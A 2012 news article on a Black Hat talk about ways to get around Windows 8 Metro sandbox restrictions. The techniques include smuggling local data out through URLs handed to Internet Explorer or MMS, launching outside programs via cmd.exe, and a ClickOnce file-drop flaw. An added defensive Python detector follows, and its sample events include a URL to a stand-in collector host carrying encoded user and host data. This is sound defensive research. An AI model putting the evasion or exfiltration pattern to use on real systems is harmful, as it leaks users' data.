Black Hat: Researcher pinpoints promising ways to attack Windows 8

Windows 8 has soft spots where attackers could apply pressure, researcher says

By , Network World
July 27, 2012 04:04 PM ET

Network World - Windows 8 offers some promising opportunities for attackers, but overall is a much more secure operating system than its predecessor, a researcher told the Black Hat conference.

There are at least three attack points in Windows 8 that with more work might yield vulnerabilities that could be exploited, says Sung-ting Tsai, leader of an advanced threat research team for Trend Micro, who was interviewed for this story after his Black Hat presentation.

But more promising are two methods of evading some security provisions Microsoft has put in place with its new operating system.

The first of these is getting around limitations placed on Windows 8 Metro style applications that prevent them from accessing the Internet. Rather than trying to break through that restriction, an application could instead access an application that has such permission.

So an application that lacks an Internet permission could still send messages to the Internet via Internet Explorer or Microsoft Media Server and append local information to the URL that IE or MMS is instructed to seek, he says. Similarly, a Word or Excel file that the Metro app accesses could contain code to connect to the Internet.

With Internet access, a rogue app could upload data from the local machine to a machine on the Internet controlled by an attacker.

Microsoft says it won't do anything about this, according to the company response Tsai includes in his Black Hat presentation. That's because accessing the Internet would be visible to users, who could stop it if they disapproved. Similarly, antivirus products could catch such access. Once this type of activity is reported to Microsoft, it could remove the app from user machines.

Tsai says he disagrees. When the average user sees a Metro app launch MMS, it won't raise suspicion that the application is trying to access the Internet, he says. But even if the user is aware, it is difficult to determine whether the access is normal or malicious behavior. Antivirus software would have similar difficulty telling the difference, he says.
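A defender's view of the pattern described above, as an added example that is not from the article or from Tsai's presentation: a triage heuristic over process-start events that separates an ordinary browser launch from one where a sandboxed parent hands Internet Explorer a URL carrying a long, high-entropy parameter. The event schema (`parent_is_appcontainer`, `image`, `command_line`), the thresholds and the sample events are assumptions constructed for illustration, and the sketch assumes telemetry that attributes the launch to the sandboxed app.

```python
import math
import ntpath
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Internet-capable helper named in the article (Internet Explorer's image name).
BROKERS = {"iexplore.exe"}

def entropy(s):
    """Shannon entropy of s in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def first_url(command_line):
    """Return the first http(s) URL argument on a command line, or None."""
    for token in command_line.split():
        token = token.strip('"')
        if token.lower().startswith(("http://", "https://")):
            return token
    return None

def classify(event, min_len=32, min_entropy=4.0):
    """Classify one (hypothetical-schema) process-start event."""
    if not event.get("parent_is_appcontainer"):
        return "ignore"  # ordinary desktop launch
    if ntpath.basename(event["image"]).lower() not in BROKERS:
        return "ignore"
    url = first_url(event["command_line"])
    if url is None:
        return "ignore"
    # A sandboxed app handing a URL to the browser is legitimate on its own,
    # so it only merits review unless a parameter looks like packed data.
    for _key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if len(value) >= min_len and entropy(value) >= min_entropy:
            return "alert"
    return "review"

# Constructed sample events (not taken from any real log).
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
TOKEN = "dXNlcj1hbGljZTtob3N0PVBDLTAxNztkb2NzPTM0Mg"  # constructed opaque value
SAMPLES = [
    {"parent_is_appcontainer": False, "image": IE,
     "command_line": f'"{IE}" https://example.com/'},
    {"parent_is_appcontainer": True, "image": IE,
     "command_line": f'"{IE}" https://example.com/help?topic=printing'},
    {"parent_is_appcontainer": True, "image": IE,
     "command_line": f'"{IE}" http://collector.example/p?d={TOKEN}'},
]

if __name__ == "__main__":
    print([classify(e) for e in SAMPLES])
```

The middle verdict, `review`, is the case Tsai describes: the launch is visible, but nothing in it distinguishes normal from malicious use.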

Another possible evasion calls for using the command prompt cmd.exe from within the application container sandbox to trigger other executables outside, Tsai says.

Microsoft says this is not a problem and Tsai agrees. But he says that, in conjunction with other executables, it could potentially exploit other vulnerabilities.

He also looks at ClickOnce, the installation package running on Windows 8. It is possible to get it to launch files to the file system that could be harmful. Tsai says Microsoft agrees and will fix it in the next release of Windows 8.
